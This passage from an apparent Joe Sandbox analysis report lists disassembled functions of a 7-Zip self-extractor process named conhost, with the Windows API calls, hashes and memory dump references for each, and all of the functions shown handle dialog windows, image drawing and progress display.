                                                                                                                                                                                                                                            • Part of subcall function 004021A8: GetWindowDC.USER32(00000000), ref: 004021B4
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402240
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402293
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402299
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A2
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A5
                                                                                                                                                                                                                                            • Part of subcall function 004021A8: ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 004023DF
                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004023F3
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00402405
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040241A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                                                                                                                                          • String ID: IMAGES$STATIC
                                                                                                                                                                                                                                          • API String ID: 4202116410-1168396491
                                                                                                                                                                                                                                          • Opcode ID: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                                                                                                                                                                                          • Instruction ID: 12319829fe5b29bb351e3d23e86017266b1b8e93f03e65421de7465a1357d20e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54419A31901218BFCB129FA1CC4CDEEBFB9FF09715B008076F905A62A0D7798A51DB69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B3), ref: 00407A80
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407A85
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B4), ref: 00407ABC
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AC1
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00407B43
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00407B49
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00407B50
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00407B57
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00407B7B
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00407B8D
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00407BA0
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C06
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00407CA0
                                                                                                                                                                                                                                            • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A47
                                                                                                                                                                                                                                            • Part of subcall function 00407A29: SetWindowPos.USER32(00000000), ref: 00407A4E
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00407BA9
                                                                                                                                                                                                                                            • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00407D25
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00407D2C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 747815384-0
                                                                                                                                                                                                                                          • Opcode ID: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                                                                                                                                                                                          • Instruction ID: 68cc850d19f91a6f8b6e213b01393e3a0b6efc74fec8c50de4b66a5980513343
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A13870E04209AFDB14DFBDCD85AAEBBF9EF48704F14452AE605F2281D678F9018B65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0041E3F0,00000000), ref: 0040377F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0041E3F0,00000000), ref: 00403787
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00404A6A,?), ref: 004039AD
                                                                                                                                                                                                                                            • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 00402996
                                                                                                                                                                                                                                            • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 0040299D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00404A6A,?,?,00000000,00000000,0041E3F0,00000000), ref: 004039DA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID: SetEnvironment${\rtf
                                                                                                                                                                                                                                          • API String ID: 613200358-318139784
                                                                                                                                                                                                                                          • Opcode ID: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                                                                                                                                                                                          • Instruction ID: 401acfcb82d7e6738f93d8480f5cee0d093a2887585a601c22b507f4e5910529
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B991C372900108ABDF11AFD5D941AEEBBB8AF14309F2480BBE841772D2D7785B06DB59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00407F94
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000), ref: 00407F9B
                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00407FB1
                                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407FCE
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000031), ref: 00407FE0
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000032), ref: 00407FE7
                                                                                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00407FF9
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00408006
                                                                                                                                                                                                                                          • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 0040803A
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00408042
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2586545124-0
                                                                                                                                                                                                                                          • Opcode ID: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                                                                                                                                                                                          • Instruction ID: 8ffa6a621c4839b38abe7fa2179ce9be6ee40ef55f84cce8d9fec75f1bbbc175
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D214F7650021ABFCB019FB8DD48EEF3B69FB08351F004525FA11E2291CB35D920CB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004091A7: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                                                                                                                                                                                            • Part of subcall function 004091A7: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                                                                                                                                                                                            • Part of subcall function 004091A7: GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                                                                                                                                                                                            • Part of subcall function 004091A7: SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                                                                                            • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B6), ref: 004094A8
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 004094AB
                                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000200,Edit,0041A840,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 004094E1
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004094F1
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B6), ref: 004094FE
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409508
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B6), ref: 00409512
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00409515
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                                                                                                                                                                                                          • String ID: Edit
                                                                                                                                                                                                                                          • API String ID: 2563414232-554135844
                                                                                                                                                                                                                                          • Opcode ID: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                                                                                                                                                                                          • Instruction ID: 4d71b540c7600c41684bbba3335aa98688d5166c257b7e93b864b054f1ea387c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA116A71A00204BFEB11ABE5DD49FAFBBBCEF48B00F104429B201F61A1C675AD50876D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403EDF
                                                                                                                                                                                                                                            • Part of subcall function 00402D03: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402D76
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403F05
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00403F27
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00403F54
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$wsprintf
                                                                                                                                                                                                                                          • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                                                                                          • API String ID: 2704270482-695273242
                                                                                                                                                                                                                                          • Opcode ID: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                                                                                                                                                                                          • Instruction ID: 886d926ed7ba0351d4e9ba57da7cb0629939e873fb03075975f52044c447bd08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15218F71A005187BDB05EAA59C86EFE73ADAB48704F14402EF504E31D1CB7DAA068799
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B3), ref: 0040779F
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B2
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B4), ref: 004077BC
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C4
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D4
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 004077DD
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077E5
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 004077EE
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000,?,?,00000000,00408726,000004B3,00000000,?,000004B3), ref: 004077F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMessageSend$Focus
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3946207451-0
                                                                                                                                                                                                                                          • Opcode ID: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                                                                                                                                                                                          • Instruction ID: d34367ada3e0903658dac9af1ca1aef10e4e5856eabac84c2cebdb26553fe681
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F04F712403087BEA216B61DD86F9BBB5EDF80B54F018425F354661F0CBF7AC209A29
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0041E470,00000160), ref: 00407E20
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407E3F
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00407E4A
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407E56
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407E65
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00407E73
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00407E9B
                                                                                                                                                                                                                                          • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007643), ref: 00407ED0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2693764856-0
                                                                                                                                                                                                                                          • Opcode ID: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                                                                                                                                                                                          • Instruction ID: 8154b001b0011d5121478cb58b91efa441906eea3886e432abe560883a3f5ac4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8421C375941318BFD7215BA1DD48EEB7B7CFF04301F0040B6FA09A2291D7744E948B6A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 0040797F
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0040799B
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000003D), ref: 004079A4
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000003E), ref: 004079AC
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 004079C9
                                                                                                                                                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004079E4
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00407A0A
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00407A19
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2466489532-0
                                                                                                                                                                                                                                          • Opcode ID: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                                                                                                                                                                                          • Instruction ID: 872bb3bd96abf1d963658246664a9f9dec04eac668a7313924c28ae5c7f0044f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF216871901209AFCB01CF69DD44A9EBFF4FF08360F10C46AE519A72A0D335AA50DF41
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040895B
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B8), ref: 00408979
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0040898B
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004089A9
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A41
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                                                                                          • String ID: %d%%
                                                                                                                                                                                                                                          • API String ID: 3753976982-1518462796
                                                                                                                                                                                                                                          • Opcode ID: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                                                                                                                                                                                          • Instruction ID: dc12f65f6354bcef20b20b64e73197b6a82627a21fa16bd919092f53849079ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C531B371500208BFCB11AF51DD45EEA7BB9FF48304F10802EF986B62E1DB79A910CB59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 00408B52
                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00408B63
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408B8D
                                                                                                                                                                                                                                          • SuspendThread.KERNEL32(00000298), ref: 00408BA6
                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000298), ref: 00408BC3
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 00408BE5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
